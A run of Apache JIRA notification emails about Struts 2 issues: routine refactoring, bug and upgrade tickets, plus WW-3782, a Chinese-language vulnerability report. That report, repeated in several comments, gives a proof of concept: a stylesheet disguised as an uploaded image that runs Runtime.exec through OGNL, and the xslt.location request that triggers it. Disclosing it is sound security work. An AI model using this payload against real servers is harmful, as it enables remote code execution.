[jira] [Closed] (WW-3777) Convert UrlHelper into a real bean
[ https://issues.apache.org/jira/browse/WW-3777?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Lukasz Lenart closed WW-3777. - > Convert UrlHelper into a real bean > -- > > Key: WW-3777 > URL: https://issues.apache.org/jira/browse/WW-3777 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.1.2 >Reporter: Lukasz Lenart >Assignee: Lukasz Lenart >Priority: Minor > Fix For: 2.3.2 > > > When converted into a bean, dependency can be inject instead using > ActionContext.getContext().getContainer(); -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Resolved] (WW-3777) Convert UrlHelper into a real bean
[ https://issues.apache.org/jira/browse/WW-3777?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Lukasz Lenart resolved WW-3777. --- Resolution: Fixed > Convert UrlHelper into a real bean > -- > > Key: WW-3777 > URL: https://issues.apache.org/jira/browse/WW-3777 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.1.2 >Reporter: Lukasz Lenart >Assignee: Lukasz Lenart >Priority: Minor > Fix For: 2.3.2 > > > When converted into a bean, dependency can be inject instead using > ActionContext.getContext().getContainer(); -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3777) Convert UrlHelper into a real bean
[
https://issues.apache.org/jira/browse/WW-3777?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13234181#comment-13234181
]
Lukasz Lenart commented on WW-3777:
---
Done, the bean is a new extension point under struts.view.urlHelper and can be
overwritten in struts-plugin.xml like this
{code:xml}
{code}
> Convert UrlHelper into a real bean
> --
>
> Key: WW-3777
> URL: https://issues.apache.org/jira/browse/WW-3777
> Project: Struts 2
> Issue Type: Improvement
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: Lukasz Lenart
>Assignee: Lukasz Lenart
>Priority: Minor
> Fix For: 2.3.2
>
>
> When converted into a bean, dependency can be inject instead using
> ActionContext.getContext().getContainer();
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3777) Convert UrlHelper into a real bean
[ https://issues.apache.org/jira/browse/WW-3777?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13234192#comment-13234192 ] Hudson commented on WW-3777: Integrated in Struts2 #434 (See [https://builds.apache.org/job/Struts2/434/]) WW-3777 converts UrlHelper into an interface with default implementation, cleanups code and adds support for generics (Revision 1303298) Result = SUCCESS lukaszlenart : Files : * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/StrutsConstants.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/components/Component.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/components/ServletUrlRenderer.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/config/BeanSelectionProvider.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/dispatcher/ServletActionRedirectResult.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/dispatcher/ServletDispatcherResult.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/dispatcher/ServletRedirectResult.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/util/StrutsUtil.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/util/URLBean.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/util/DefaultUrlHelper.java * /struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/util/UrlHelper.java * /struts/struts2/trunk/core/src/main/resources/struts-default.xml * /struts/struts2/trunk/core/src/test/java/org/apache/struts2/dispatcher/ServletActionRedirectResultTest.java * /struts/struts2/trunk/core/src/test/java/org/apache/struts2/dispatcher/ServletRedirectResultTest.java * /struts/struts2/trunk/core/src/test/java/org/apache/struts2/views/util/DefaultUrlHelperTest.java * /struts/struts2/trunk/core/src/test/java/org/apache/struts2/views/util/UrlHelperTest.java * /struts/struts2/trunk/plugins/embeddedjsp/src/main/java/org/apache/struts2/JSPRuntime.java * /struts/struts2/trunk/plugins/embeddedjsp/src/test/java/org/apache/struts2/EmbeddedJSPResultTest.java * /struts/struts2/trunk/plugins/portlet/src/main/java/org/apache/struts2/portlet/result/PortletActionRedirectResult.java > Convert UrlHelper into a real bean > -- > > Key: WW-3777 > URL: https://issues.apache.org/jira/browse/WW-3777 > Project: Struts 2 > Issue Type: Improvement > Components: Core Actions >Affects Versions: 2.3.1.2 >Reporter: Lukasz Lenart >Assignee: Lukasz Lenart >Priority: Minor > Fix For: 2.3.2 > > > When converted into a bean, dependency can be inject instead using > ActionContext.getContext().getContainer(); -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3584) convertToString in custom StrutsTypeConverter not called for multiple-valued tags (checkboxlist and select)
[ https://issues.apache.org/jira/browse/WW-3584?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] sebastien b. updated WW-3584: - Attachment: checkboxlist.ftl Just the precedent file with re-integration of css render. > convertToString in custom StrutsTypeConverter not called for multiple-valued > tags (checkboxlist and select) > --- > > Key: WW-3584 > URL: https://issues.apache.org/jira/browse/WW-3584 > Project: Struts 2 > Issue Type: Bug > Components: Core Actions >Affects Versions: 2.2.1.1 >Reporter: Antonino Virgillito >Assignee: Maurizio Cucchiara > Fix For: 2.3.x > > Attachments: checkboxlist.ftl, checkboxlist.ftl, multivalueTest.zip > > > I wrote a custom converter to map a list of custom type (List) to a > s:checkboxlist tag. When I submit the form the convertFromString() method is > called, so I have the list correctly populated with the selected values. > The problem is that it doesn't work the other way: when I try to pre-populate > the form from the values in the list, the tag is always empty, because the > convertToString() method is never called. Same happens for s:select with > multiple="true". > I think it is a bug because if I change the tag to s:textfield, mapped to the > same list, convertToString() is called and text box is populated. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Issue Comment Edited] (WW-3584) convertToString in custom StrutsTypeConverter not called for multiple-valued tags (checkboxlist and select)
[ https://issues.apache.org/jira/browse/WW-3584?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13234216#comment-13234216 ] sebastien b. edited comment on WW-3584 at 3/21/12 9:21 AM: --- The bug is solved for me with the checkboxlist.ftl file corrected. I modified this file only to add the css render. Thanks ! CCordially. was (Author: sebmatrix): Just the precedent file with re-integration of css render. > convertToString in custom StrutsTypeConverter not called for multiple-valued > tags (checkboxlist and select) > --- > > Key: WW-3584 > URL: https://issues.apache.org/jira/browse/WW-3584 > Project: Struts 2 > Issue Type: Bug > Components: Core Actions >Affects Versions: 2.2.1.1 >Reporter: Antonino Virgillito >Assignee: Maurizio Cucchiara > Fix For: 2.3.x > > Attachments: checkboxlist.ftl, checkboxlist.ftl, multivalueTest.zip > > > I wrote a custom converter to map a list of custom type (List) to a > s:checkboxlist tag. When I submit the form the convertFromString() method is > called, so I have the list correctly populated with the selected values. > The problem is that it doesn't work the other way: when I try to pre-populate > the form from the values in the list, the tag is always empty, because the > convertToString() method is never called. Same happens for s:select with > multiple="true". > I think it is a bug because if I change the tag to s:textfield, mapped to the > same list, convertToString() is called and text box is populated. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Issue Comment Edited] (WW-3584) convertToString in custom StrutsTypeConverter not called for multiple-valued tags (checkboxlist and select)
[ https://issues.apache.org/jira/browse/WW-3584?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13234216#comment-13234216 ] sebastien b. edited comment on WW-3584 at 3/21/12 9:23 AM: --- The bug is solved for me with the checkboxlist.ftl file corrected. I modified only this file to add the css render. Thanks ! CCordially. was (Author: sebmatrix): The bug is solved for me with the checkboxlist.ftl file corrected. I modified this file only to add the css render. Thanks ! CCordially. > convertToString in custom StrutsTypeConverter not called for multiple-valued > tags (checkboxlist and select) > --- > > Key: WW-3584 > URL: https://issues.apache.org/jira/browse/WW-3584 > Project: Struts 2 > Issue Type: Bug > Components: Core Actions >Affects Versions: 2.2.1.1 >Reporter: Antonino Virgillito >Assignee: Maurizio Cucchiara > Fix For: 2.3.x > > Attachments: checkboxlist.ftl, checkboxlist.ftl, multivalueTest.zip > > > I wrote a custom converter to map a list of custom type (List) to a > s:checkboxlist tag. When I submit the form the convertFromString() method is > called, so I have the list correctly populated with the selected values. > The problem is that it doesn't work the other way: when I try to pre-populate > the form from the values in the list, the tag is always empty, because the > convertToString() method is never called. Same happens for s:select with > multiple="true". > I think it is a bug because if I change the tag to s:textfield, mapped to the > same list, convertToString() is called and text box is populated. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Issue Comment Edited] (WW-3584) convertToString in custom StrutsTypeConverter not called for multiple-valued tags (checkboxlist and select)
[ https://issues.apache.org/jira/browse/WW-3584?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13234216#comment-13234216 ] sebastien b. edited comment on WW-3584 at 3/21/12 9:24 AM: --- The bug is solved for me with the checkboxlist.ftl file corrected. I modified only this file to add the css render. Thanks ! Cordially. was (Author: sebmatrix): The bug is solved for me with the checkboxlist.ftl file corrected. I modified only this file to add the css render. Thanks ! CCordially. > convertToString in custom StrutsTypeConverter not called for multiple-valued > tags (checkboxlist and select) > --- > > Key: WW-3584 > URL: https://issues.apache.org/jira/browse/WW-3584 > Project: Struts 2 > Issue Type: Bug > Components: Core Actions >Affects Versions: 2.2.1.1 >Reporter: Antonino Virgillito >Assignee: Maurizio Cucchiara > Fix For: 2.3.x > > Attachments: checkboxlist.ftl, checkboxlist.ftl, multivalueTest.zip > > > I wrote a custom converter to map a list of custom type (List) to a > s:checkboxlist tag. When I submit the form the convertFromString() method is > called, so I have the list correctly populated with the selected values. > The problem is that it doesn't work the other way: when I try to pre-populate > the form from the values in the list, the tag is always empty, because the > convertToString() method is never called. Same happens for s:select with > multiple="true". > I think it is a bug because if I change the tag to s:textfield, mapped to the > same list, convertToString() is called and text box is populated. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Created] (WW-3780) Make json plugin more extendable
Make json plugin more extendable Key: WW-3780 URL: https://issues.apache.org/jira/browse/WW-3780 Project: Struts 2 Issue Type: Improvement Components: Plugin - JSON Affects Versions: 2.3.1.2 Reporter: Pelladi Gabor Priority: Minor Currently it is difficult to modify/extend the current behaviour of the json plugin. I had the following problem. We use joda-time because it is much better than standard Date. The json plugin cannot handle classes like LocalDate, which is not a problem in itself. But it needs a lot of boilerplate code to output beans containing a LocalDate field using json. Currently I have to create duplicates of the service layer DTO-s, annotate the fields in the UI copy with @JSONFieldBridge, and copy one DTO into the other using dozer or something. This creates a lot of useless code and manual work. It would be much easier if I could extend JSONWriter and add support for my joda-time classes. No duplication of DTO-s, no need to manually annotate all fields. This would require only to modify the visibility of some private methods to protected, and some package-protected classes to public. This way I could create my struts2 result type, which extends JSONResult, and use my writer, which extends JSONWriter. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3780) Make json plugin more extendable
[ https://issues.apache.org/jira/browse/WW-3780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Pelladi Gabor updated WW-3780: -- Attachment: WW-3780.diff Patch that changes visibility. > Make json plugin more extendable > > > Key: WW-3780 > URL: https://issues.apache.org/jira/browse/WW-3780 > Project: Struts 2 > Issue Type: Improvement > Components: Plugin - JSON >Affects Versions: 2.3.1.2 >Reporter: Pelladi Gabor >Priority: Minor > Attachments: WW-3780.diff > > > Currently it is difficult to modify/extend the current behaviour of the json > plugin. > I had the following problem. We use joda-time because it is much better than > standard Date. The json plugin cannot handle classes like LocalDate, which is > not a problem in itself. But it needs a lot of boilerplate code to output > beans containing a LocalDate field using json. Currently I have to create > duplicates of the service layer DTO-s, annotate the fields in the UI copy > with @JSONFieldBridge, and copy one DTO into the other using dozer or > something. > This creates a lot of useless code and manual work. It would be much easier > if I could extend JSONWriter and add support for my joda-time classes. No > duplication of DTO-s, no need to manually annotate all fields. This would > require only to modify the visibility of some private methods to protected, > and some package-protected classes to public. This way I could create my > struts2 result type, which extends JSONResult, and use my writer, which > extends JSONWriter. -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Created] (WW-3781) Upgrade XStream version
Upgrade XStream version --- Key: WW-3781 URL: https://issues.apache.org/jira/browse/WW-3781 Project: Struts 2 Issue Type: Task Components: Other Affects Versions: 2.3.1.2 Reporter: Eric Lentz Priority: Trivial I recently started using XStream for development not related to Struts 2, and found that the version being used is 1.2.2, which was released in May of 2007 [1][2]. I upgraded to 1.4.2, the latest[3], and haven't had any issues with Struts although I have not exhaustively tested and certainly haven't run any Struts core unit tests. Having a newer version would make it easier to utilize within the same web app. for which I'm running Struts 2. [1] http://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.2.2/ [2] http://xstream.codehaus.org/changes.html [3] http://xstream.codehaus.org/download.html -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3781) Upgrade XStream version
[ https://issues.apache.org/jira/browse/WW-3781?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Lukasz Lenart updated WW-3781: -- Fix Version/s: 2.3.2 > Upgrade XStream version > --- > > Key: WW-3781 > URL: https://issues.apache.org/jira/browse/WW-3781 > Project: Struts 2 > Issue Type: Task > Components: Other >Affects Versions: 2.3.1.2 >Reporter: Eric Lentz >Priority: Trivial > Fix For: 2.3.2 > > > I recently started using XStream for development not related to Struts 2, and > found that the version being used is 1.2.2, which was released in May of 2007 > [1][2]. I upgraded to 1.4.2, the latest[3], and haven't had any issues with > Struts although I have not exhaustively tested and certainly haven't run any > Struts core unit tests. Having a newer version would make it easier to > utilize within the same web app. for which I'm running Struts 2. > [1] http://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.2.2/ > [2] http://xstream.codehaus.org/changes.html > [3] http://xstream.codehaus.org/download.html -- This message is automatically generated by JIRA. If you think it was sent incorrectly, please contact your JIRA administrators: https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
kxlzx updated WW-3782:
--
Attachment: struts.jpg
> struts2框架XSLTResult本地文件代码执行漏洞
> -
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: kxlzx
>Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
>
> http://www.w3.org/1999/XSL/Transform";
>version="1.0" xmlns:ognl="ognl.Ognl">
>
>
>
> hacked by kxlzx
> http://www.inbreak.net
>
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
>
>
>
>
>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Updated] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
kxlzx updated WW-3782:
--
Description:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest =
ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
hacked by kxlzx
http://www.inbreak.net
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
!https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
was:
http://www.inbreak.net/archives/319
Reporter : kxlzx , Alibaba Security Team
http://www.inbreak.net/
struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
这是XSLTResult文件代码:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
//获取用户提交的"xslt.location"的值
String pathFromRequest =
ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
URL resource = ServletActionContext.getServletContext().getResource(path);
//解析用户提交的文件地址为xslt
templates = factory.newTemplates(new StreamSource(resource.openStream()));
而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
/upload/7758521.gif
http://www.w3.org/1999/XSL/Transform";
version="1.0" xmlns:ognl="ognl.Ognl">
hacked by kxlzx
http://www.inbreak.net
这个xsl文件解析时,会调用ognl中的
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
导致执行任意代码。
假设一个xslt的返回action地址为
http://www.inbreak.net/xslt.action
我们就可以提交
http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
就会变成
http://www.inbreak.net/wp-content/uploads/2011/08/struts.jpg
> struts2框架XSLTResult本地文件代码执行漏洞
> -
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: kxlzx
>Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
>
> http://www.w3.org/1999/XSL/Transform";
>version="1.0" xmlns:ognl="ognl.Ognl">
>
>
>
> hacked by kxlzx
> http://www.inbreak.net
>
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
>
>
>
>
>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent inc
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235302#comment-13235302
]
zhouyanming commented on WW-3782:
-
哥们太搞了,天朝还没占领全世界
> struts2框架XSLTResult本地文件代码执行漏洞
> -
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: kxlzx
>Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
>
> http://www.w3.org/1999/XSL/Transform";
>version="1.0" xmlns:ognl="ognl.Ognl">
>
>
>
> hacked by kxlzx
> http://www.inbreak.net
>
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
>
>
>
>
>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235345#comment-13235345
]
kxlzx commented on WW-3782:
---
以前都是我用google翻译,这次推荐给大家用。
If you can not read, open here.
http://translate.google.com/#zh-CN|en|%E5%A6%82%E6%9E%9C%E4%BD%A0%E7%9C%8B%E4%B8%8D%E6%87%82%EF%BC%8C%E8%AF%B7%E6%89%93%E5%BC%80%E8%BF%99%E9%87%8C%E3%80%82
> struts2框架XSLTResult本地文件代码执行漏洞
> -
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: kxlzx
>Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
>
> http://www.w3.org/1999/XSL/Transform";
>version="1.0" xmlns:ognl="ognl.Ognl">
>
>
>
> hacked by kxlzx
> http://www.inbreak.net
>
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
>
>
>
>
>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞
[
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235406#comment-13235406
]
Lukasz Lenart commented on WW-3782:
---
W czym jest problem ?
If you can not read, open here.
http://translate.google.com/#pl|zh-CN|W%20czym%20jest%20problem%20%3F
> struts2框架XSLTResult本地文件代码执行漏洞
> -
>
> Key: WW-3782
> URL: https://issues.apache.org/jira/browse/WW-3782
> Project: Struts 2
> Issue Type: Bug
> Components: Core Actions
>Affects Versions: 2.3.1.2
>Reporter: kxlzx
>Priority: Critical
> Labels: patch
> Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型,其中包括XSLT类型,这种类型允许接受用户提交一个文件地址,并且去解析它为XSLT文件,无论扩展名是什么。
> 这是XSLTResult文件代码:
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest =
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 而XSLT解析,会允许执行java静态方法,所以,只要上传一个文件在服务器上,例如
> /upload/7758521.gif
>
> http://www.w3.org/1999/XSL/Transform";
>version="1.0" xmlns:ognl="ognl.Ognl">
>
>
>
> hacked by kxlzx
> http://www.inbreak.net
>
> select="ognl:getValue('@Runtime@getRuntime().exec("calc")', '')"/>
>
>
>
>
>
> 这个xsl文件解析时,会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 假设一个xslt的返回action地址为
>
> http://www.inbreak.net/xslt.action
>
> 我们就可以提交
>
> http://www.inbreak.net/xslt.action?xslt.location=upload/a.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!
--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators:
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira
